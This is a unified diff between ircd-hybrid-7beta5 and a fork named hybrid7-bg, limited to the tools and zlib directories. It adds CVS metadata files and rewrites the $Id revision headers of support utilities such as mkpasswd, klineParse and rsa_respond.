diff -uNrd ircd-hybrid-7beta5/tools/CVS/Entries hybrid7-bg/tools/CVS/Entries
--- ircd-hybrid-7beta5/tools/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/tools/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1,15 @@
+/Makefile.in/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/README/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/README.mkpasswd/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/convertconf.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/fixklines.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/ircd.conf/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/ircd.conf.new/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/ircd_start.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/klineParse.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/mkconf/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/mkpasswd.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/start_ircd.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/untabify/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/viconf.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+D/rsa_respond////
diff -uNrd ircd-hybrid-7beta5/tools/CVS/Repository hybrid7-bg/tools/CVS/Repository
--- ircd-hybrid-7beta5/tools/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/tools/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/tools
diff -uNrd ircd-hybrid-7beta5/tools/CVS/Root hybrid7-bg/tools/CVS/Root
--- ircd-hybrid-7beta5/tools/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/tools/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/tools/README hybrid7-bg/tools/README
--- ircd-hybrid-7beta5/tools/README	Thu Jan 18 19:26:37 2001
+++ hybrid7-bg/tools/README	Tue Jun  5 12:35:47 2001
@@ -1,4 +1,4 @@
-$Id: README,v 7.6 2001/01/19 00:26:37 wcampbel Exp $
+$Id: README,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
 
 A directory of support programs for ircd.
 
diff -uNrd ircd-hybrid-7beta5/tools/README.mkpasswd hybrid7-bg/tools/README.mkpasswd
--- ircd-hybrid-7beta5/tools/README.mkpasswd	Mon Jan 15 09:20:02 2001
+++ hybrid7-bg/tools/README.mkpasswd	Tue Jun  5 12:35:47 2001
@@ -1,5 +1,5 @@
 mkpasswd.c documentation
-$Id: README.mkpasswd,v 1.2 2001/01/15 14:20:02 wcampbel Exp $
+$Id: README.mkpasswd,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
 
 This is documentation for the mkpasswd.c included in ircd-hybrid-7.
 
diff -uNrd ircd-hybrid-7beta5/tools/convertconf.c hybrid7-bg/tools/convertconf.c
--- ircd-hybrid-7beta5/tools/convertconf.c	Wed Apr 25 18:15:20 2001
+++ hybrid7-bg/tools/convertconf.c	Tue Jun  5 12:35:47 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- * $Id: convertconf.c,v 1.27 2001/04/25 22:15:20 kreator Exp $
+ * $Id: convertconf.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/tools/fixklines.c hybrid7-bg/tools/fixklines.c
--- ircd-hybrid-7beta5/tools/fixklines.c	Wed Oct 13 20:35:26 1999
+++ hybrid7-bg/tools/fixklines.c	Tue Jun  5 12:35:47 2001
@@ -1,6 +1,6 @@
 /*
 fixklines - scan an ircd.conf or kline.conf file
-$Id: fixklines.c,v 7.2 1999/10/14 00:35:26 db Exp $
+$Id: fixklines.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
   D lines of form
   D:192.168.0.* are converted to D:192.168.0.0/24
   K-lines of form
diff -uNrd ircd-hybrid-7beta5/tools/ircd_start.c hybrid7-bg/tools/ircd_start.c
--- ircd-hybrid-7beta5/tools/ircd_start.c	Fri Oct  6 00:27:08 2000
+++ hybrid7-bg/tools/ircd_start.c	Tue Jun  5 12:35:47 2001
@@ -1,7 +1,7 @@
 /*
  * contributed by mjr
- * $Id: ircd_start.c,v 7.2 2000/10/06 04:27:08 lusky Exp $
- * $Id: ircd_start.c,v 7.2 2000/10/06 04:27:08 lusky Exp $
+ * $Id: ircd_start.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
+ * $Id: ircd_start.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  */
 
 #include <stdio.h>
diff -uNrd ircd-hybrid-7beta5/tools/klineParse.c hybrid7-bg/tools/klineParse.c
--- ircd-hybrid-7beta5/tools/klineParse.c	Fri Oct  6 00:27:08 2000
+++ hybrid7-bg/tools/klineParse.c	Tue Jun  5 12:35:47 2001
@@ -1,11 +1,11 @@
-/* $Id: klineParse.c,v 7.2 2000/10/06 04:27:08 lusky Exp $
+/* $Id: klineParse.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  * 1.0  17Dec98 Darkshde -- Initial bug ridden release
  * 2.0  07Jan99 Darkshde -- added redundant kline checking
  * 2.1  11Jan99 Darkshde -- added -f made verbose display optional with -v
  *
  * This program will take a kline.conf and remove duplicate and redundant 
  * entries from it, creating a kline.conf.parsed file
- * $Id: klineParse.c,v 7.2 2000/10/06 04:27:08 lusky Exp $
+ * $Id: klineParse.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  */
 
 #define kParseVer "2.12"
diff -uNrd ircd-hybrid-7beta5/tools/mkconf hybrid7-bg/tools/mkconf
--- ircd-hybrid-7beta5/tools/mkconf	Sun Aug  1 17:19:57 1999
+++ hybrid7-bg/tools/mkconf	Tue Jun  5 12:35:47 2001
@@ -1,6 +1,6 @@
 #!/bin/sh
 #
-# $Id: mkconf,v 7.0.0.1 1999/08/01 21:19:57 lusky Exp $
+# $Id: mkconf,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
 # Copyright (C) 1999 Patrick Alken
 #
 # Usage: ./mkconf [options]
diff -uNrd ircd-hybrid-7beta5/tools/mkpasswd.c hybrid7-bg/tools/mkpasswd.c
--- ircd-hybrid-7beta5/tools/mkpasswd.c	Tue Jan 16 11:56:03 2001
+++ hybrid7-bg/tools/mkpasswd.c	Tue Jun  5 12:35:47 2001
@@ -5,7 +5,7 @@
  * md5 patch by Walter Campbell <wcampbel@botbay.net>
  * Modernization, getopt, etc for the Hybrid IRCD team
  *
- * $Id: mkpasswd.c,v 7.4 2001/01/16 16:56:03 wcampbel Exp $
+ * $Id: mkpasswd.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  */
 #include <stdio.h>
 #include <string.h>
diff -uNrd ircd-hybrid-7beta5/tools/rsa_respond/CVS/Entries hybrid7-bg/tools/rsa_respond/CVS/Entries
--- ircd-hybrid-7beta5/tools/rsa_respond/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/tools/rsa_respond/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1,5 @@
+/Makefile/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/README/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/genkey.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+/respond.c/1.1.1.1/Tue Jun  5 16:35:47 2001//
+D
diff -uNrd ircd-hybrid-7beta5/tools/rsa_respond/CVS/Repository hybrid7-bg/tools/rsa_respond/CVS/Repository
--- ircd-hybrid-7beta5/tools/rsa_respond/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/tools/rsa_respond/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/tools/rsa_respond
diff -uNrd ircd-hybrid-7beta5/tools/rsa_respond/CVS/Root hybrid7-bg/tools/rsa_respond/CVS/Root
--- ircd-hybrid-7beta5/tools/rsa_respond/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/tools/rsa_respond/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
diff -uNrd ircd-hybrid-7beta5/tools/rsa_respond/Makefile hybrid7-bg/tools/rsa_respond/Makefile
--- ircd-hybrid-7beta5/tools/rsa_respond/Makefile	Sun Feb 18 00:44:49 2001
+++ hybrid7-bg/tools/rsa_respond/Makefile	Tue Jun  5 12:35:47 2001
@@ -1,4 +1,4 @@
-# $Id: Makefile,v 1.5 2001/02/18 05:44:49 wcampbel Exp $
+# $Id: Makefile,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
 
 all: genkey respond
 genkey: genkey.c
diff -uNrd ircd-hybrid-7beta5/tools/rsa_respond/README hybrid7-bg/tools/rsa_respond/README
--- ircd-hybrid-7beta5/tools/rsa_respond/README	Sun Feb 18 00:44:49 2001
+++ hybrid7-bg/tools/rsa_respond/README	Tue Jun  5 12:35:47 2001
@@ -39,4 +39,4 @@
 genkey and respond compile properly, and have been tested on FreeBSD 4.x,
 Linux glibc, and Cygwin 1.2 or higher.
 
-# $Id: README,v 1.5 2001/02/18 05:44:49 wcampbel Exp $
+# $Id: README,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
diff -uNrd ircd-hybrid-7beta5/tools/rsa_respond/genkey.c hybrid7-bg/tools/rsa_respond/genkey.c
--- ircd-hybrid-7beta5/tools/rsa_respond/genkey.c	Fri Feb  2 23:05:37 2001
+++ hybrid7-bg/tools/rsa_respond/genkey.c	Tue Jun  5 12:35:47 2001
@@ -17,7 +17,7 @@
  *  You should have received a copy of the GNU General Public License
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
- *  $Id: genkey.c,v 1.6 2001/02/03 04:05:37 a1kmm Exp $
+ *  $Id: genkey.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  */
 
 #include <openssl/rsa.h>
diff -uNrd ircd-hybrid-7beta5/tools/rsa_respond/respond.c hybrid7-bg/tools/rsa_respond/respond.c
--- ircd-hybrid-7beta5/tools/rsa_respond/respond.c	Fri Feb  2 23:05:37 2001
+++ hybrid7-bg/tools/rsa_respond/respond.c	Tue Jun  5 12:35:47 2001
@@ -17,7 +17,7 @@
  *  You should have received a copy of the GNU General Public License
  *  along with this program; if not, write to the Free Software
  *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
- *  $Id: respond.c,v 1.5 2001/02/03 04:05:37 a1kmm Exp $
+ *  $Id: respond.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  */
 #include <openssl/rsa.h>
 #include <openssl/md5.h>
diff -uNrd ircd-hybrid-7beta5/tools/start_ircd.c hybrid7-bg/tools/start_ircd.c
--- ircd-hybrid-7beta5/tools/start_ircd.c	Sun Aug  1 17:19:57 1999
+++ hybrid7-bg/tools/start_ircd.c	Tue Jun  5 12:35:47 2001
@@ -17,7 +17,7 @@
 Diane Bruce, db May 11 1998
 */
 
-static char *version="$Id: start_ircd.c,v 7.0.0.1 1999/08/01 21:19:57 lusky Exp $";
+static char *version="$Id: start_ircd.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $";
 
 #define IRCDDIR "/usr/local/lib/ircd"
 
diff -uNrd ircd-hybrid-7beta5/tools/untabify hybrid7-bg/tools/untabify
--- ircd-hybrid-7beta5/tools/untabify	Sun Aug  1 17:19:57 1999
+++ hybrid7-bg/tools/untabify	Tue Jun  5 12:35:47 2001
@@ -2,7 +2,7 @@
 #
 # untabify - convert tabs to spaces
 #
-# $Id: untabify,v 7.0.0.1 1999/08/01 21:19:57 lusky Exp $
+# $Id: untabify,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
 use Text::Tabs;
 $tabstop = 8;
 while (<>) { print expand($_) }
diff -uNrd ircd-hybrid-7beta5/tools/viconf.c hybrid7-bg/tools/viconf.c
--- ircd-hybrid-7beta5/tools/viconf.c	Sat Dec 30 18:26:04 2000
+++ hybrid7-bg/tools/viconf.c	Tue Jun  5 12:35:47 2001
@@ -1,7 +1,7 @@
 /*
  * viconf.c
  *
- * $Id: viconf.c,v 7.2 2000/12/30 23:26:04 lusky Exp $
+ * $Id: viconf.c,v 1.1.1.1 2001/06/05 16:35:47 demond Exp $
  */
 #include <stdio.h>
 #include <unistd.h>
diff -uNrd ircd-hybrid-7beta5/zlib/CVS/Entries hybrid7-bg/zlib/CVS/Entries
--- ircd-hybrid-7beta5/zlib/CVS/Entries	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/zlib/CVS/Entries	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+D
diff -uNrd ircd-hybrid-7beta5/zlib/CVS/Repository hybrid7-bg/zlib/CVS/Repository
--- ircd-hybrid-7beta5/zlib/CVS/Repository	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/zlib/CVS/Repository	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+hybrid7-bg/zlib
diff -uNrd ircd-hybrid-7beta5/zlib/CVS/Root hybrid7-bg/zlib/CVS/Root
--- ircd-hybrid-7beta5/zlib/CVS/Root	Wed Dec 31 19:00:00 1969
+++ hybrid7-bg/zlib/CVS/Root	Wed Jul 24 18:32:02 2002
@@ -0,0 +1 @@
+/var/source/src
